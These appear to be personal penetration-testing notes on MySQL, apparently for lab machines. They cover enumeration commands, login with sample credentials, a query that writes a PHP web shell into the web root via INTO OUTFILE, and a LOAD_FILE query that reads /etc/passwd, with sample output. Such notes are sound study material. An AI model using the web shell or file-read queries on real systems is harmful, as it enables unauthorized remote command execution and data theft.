Monty's Pentesting Notes | Obsidian

    MySQL

    TCP port 3306

    • Nmap Script --script mysql*

    Table of Contents

    Linux

    mysql -u root -pP4SSw0rd -h 10.129.14.128

    Windows

    C:\htb> mysql.exe -u username -pPassword123 -h 10.129.20.13

    SQL Commands

    CommandDescription
    mysql -u <user> -p<password> -h <IP address>Connect to the MySQL server. There should not be a space between the '-p' flag, and the password.
    show databases;Show all databases.
    use <database>;Select one of the existing databases.
    show tables;Show all available tables in the selected database.
    show columns from <table>;Show all columns in the selected database.
    select * from <table>;Show everything in the desired table.
    select * from <table> where <column> = "<string>";Search for needed string in the desired table.

    Writing Local File

    mysql> SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';

Query OK, 1 row affected (0.001 sec)

    check privileges to write files

    mysql> show variables like "secure_file_priv";

+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_file_priv |       |
+------------------+-------+

1 row in set (0.005 sec)

    Reading Local File

    mysql> select LOAD_FILE("/etc/passwd");

+--------------------------+
| LOAD_FILE("/etc/passwd")
+--------------------------------------------------+
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync

<SNIP>